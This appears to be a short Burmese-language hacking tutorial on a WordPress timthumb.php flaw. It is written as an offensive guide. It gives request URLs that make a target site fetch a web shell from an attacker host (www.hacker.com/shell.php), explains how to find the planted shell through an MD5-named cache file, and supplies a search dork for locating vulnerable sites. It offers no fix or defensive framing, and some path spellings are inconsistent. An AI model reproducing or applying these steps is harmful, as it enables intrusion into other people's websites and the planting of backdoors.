WordPress ရဲ ့ Zer0 Day Exploit

WP ရဲ ့ Zer0 Day Exploit ကေတာ့ timthumb.php ကေန ေပါက္တာပါ။
timthumb ဆိုတဲ ့plug-in ဟာ photo ေတြကို ခ်ံဳ ့တဲ့ ခ်ဲ ့တဲ့ အခါ အရမ္း အသံုး၀င္ပါတယ္။
အဲ့ plug-in ကေနတဆင့္ တျခား URL ေတြက photo ေတြကိုပါ upload လုပ္လို ့ရပါတယ္။
exploit ကလည္း အဲ့မွာ စျဖစ္ေတာ့တာပဲ....
တျခား link ေတြကေန photo ယူမယ္ဆိုရင္ example အေနနဲ ့

www.target.com/.../timthumb.php?src=www.photosite.com/photo.php

ဆိုျပီးေတာ့ အလုပ္လုပ္တယ္ခင္ဗ်။
အဲ့ဒီမွာ src= ရဲ ့ေနာက္မွာ မိမိ shell link ကို သြားထည့္မယ္ဆိုရင္

www.target.com/.../timthumb.php?src=www.hacker.com/shell.php

အဲ့ဒီနည္းနဲ ့ shell ကို upload လုပ္သြားမွာျဖစ္ပါတယ္။

ဒီေနရာမွာ shell link ကို ဘယ္လိုျပန္ယူရမလဲဆိုေတာ့ shell.php ကို MD5 ျပန္ေျပာင္းေပးရမယ္ဗ်။
ဒါမွ www.hacker.com/shell.php ကို 3132FF33A3414422F97F13251661A890 အေနနဲ ့ေျပာင္းမယ္ဗ်ာ။
ဒါဆိုရင္ေတာ့ www.target.com/.../cach/src=3132FF33A3414422F97F13251661A890.php ကိုသြားလိုက္ရင္ မိမိတင္ထားတဲ ့ shell ကိုေတြ ့ရမွာျဖစ္ပါတယ္။

Zer0 Day Exploit ဟာ theme က plug-in မွာ ေပါက္ေနတာျဖစ္တဲ့အတြက္ thumb ရွိတဲ ့ directory ကိုသြားတဲ ့ေနရာမွာ theme ေပၚမူတည္ျပီး သြားရမွာျဖစ္ပါတယ္။
Example အေနနဲ ့ www.target.com ရဲ ့ theme ဟာ Fordrepoter ျဖစ္ရင္
www.target.com/fordrepoter/scripts/thumb.php ျဖစ္ျပီး upload လုပ္ခ်င္ရင္ေတာ့

www.target.com/fordrepoter/scripts/thumb.php?src=www.hacker.com/shell.php

နဲ ့လုပ္ရပါမယ္။
shell ကို ျပန္သြားဖို ့အတြက္ကေတာ့ www.target.com/fordrepoter/scripts/cache/src=3132FF33A3414422F97F13251661A890.php ဆိုတဲ့ format အတိုင္း ျပန္သြားရပါ့မယ္။

Dork နဲ ့ရွာရင္လည္း theme ေပၚမူတည္ျပီး inurl ဒါမွမဟုတ္ allinurl နဲ ့တြဲျပီးေတာ့
fordreporter/scripts/thumb.php ဆိုျပီး ရွာရပါမယ္။